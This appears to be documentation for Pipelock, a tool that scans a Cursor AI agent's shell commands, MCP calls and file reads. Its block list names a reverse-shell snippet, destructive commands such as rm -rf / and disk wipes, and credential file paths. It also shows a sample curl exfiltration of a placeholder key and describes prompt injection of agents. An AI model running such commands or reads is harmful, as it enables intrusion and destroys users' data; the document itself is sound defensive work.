Cursor’s AI agent has shell access, can read your files, and calls MCP tools on your behalf. If the agent gets tricked by a prompt injection or a poisoned MCP server, it can exfiltrate credentials, open reverse shells, or destroy your repository.
Pipelock adds a security layer between Cursor’s agent and those actions. When hooks are installed and active, shell commands, MCP tool calls, and file reads pass through Pipelock’s scanning pipeline before they execute.
Demo
The agent tries to run a curl command containing a fake AWS access key. Pipelock’s DLP scanner catches the credential pattern and blocks the command before it reaches the shell. Cursor shows “(Rejected)” with an explanation of what was blocked and why.
Install
Install the binary:
# Homebrew (macOS / Linux)
brew install luckyPipewrench/tap/pipelock
# Go
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest
Register the hooks:
pipelock cursor install
Restart Cursor. That’s it.
The install command writes ~/.cursor/hooks.json with three hooks: beforeShellExecution, beforeMCPExecution, and beforeReadFile. Each hook calls pipelock cursor hook, which reads the event from stdin, scans it, and returns an allow or deny decision.
What it blocks
Credential exfiltration (DLP). 46 credential patterns covering AWS keys, GitHub tokens, Anthropic/OpenAI API keys, private keys, JWTs, Google OAuth secrets, Slack tokens, financial account numbers, and more. Includes 4 checksum validators (Luhn, mod97, ABA, WIF) for structured formats. Catches secrets in shell arguments, MCP tool inputs, and file contents. Handles base64, hex, and URL encoding.
Dangerous shell commands. Reverse shells (bash -i >& /dev/tcp/...), destructive operations (rm -rf /), force pushes (git push --force), disk wipes (dd if=/dev/zero), and shell obfuscation techniques (variable expansion, brace expansion, encoded commands).
Sensitive file access. Blocks reads of ~/.ssh/id_rsa, ~/.aws/credentials, .env, /etc/shadow, .netrc, and other credential files.
Prompt injection in MCP tools. Scans MCP tool arguments for injection patterns and credential leaks before the tool executes.
How it works
Cursor’s hooks system sends a JSON event to stdin when the agent tries to execute an action:
{
"hook_event_name": "beforeShellExecution",
"command": "curl https://httpbin.org/get?token=AKIAIOSFODNN7EXAMPLE",
"cwd": "/home/user/project"
}
Pipelock evaluates the event against its scanning pipeline and responds:
{
"permission": "deny",
"user_message": "pipelock: blocked (DLP: AWS Access Key ID)",
"agent_message": "This action was blocked by pipelock security scanning."
}
Cursor displays the user_message to you and the agent_message to the AI. The agent sees the block and adjusts its approach.
Custom config
By default, pipelock cursor hook uses a built-in security profile with 9 tool policy rules and all scanning features enabled. To customize:
# Generate a config file
pipelock generate config --preset cursor > ~/.config/pipelock/cursor.yaml
# Use it with the hook
pipelock cursor install --config ~/.config/pipelock/cursor.yaml
The cursor preset is a good starting point. See the configuration reference for all options.
Verify the installation
After installing, confirm the hooks are registered:
pipelock verify-install
This runs 10 checks validating the scanning pipeline, network containment, and hook configuration.
Works on all Cursor plans
Cursor hooks are available on every plan, including the free Hobby tier.
Scan your repo first
Before starting work in a new repository, scan it for dangerous IDE config files that might have been committed by a previous contributor:
pipelock preflight .
This detects poisoned .cursor/hooks.json, .cursor/mcp.json, .mcp.json, and .claude/settings.json files that could override your security settings or register malicious MCP servers.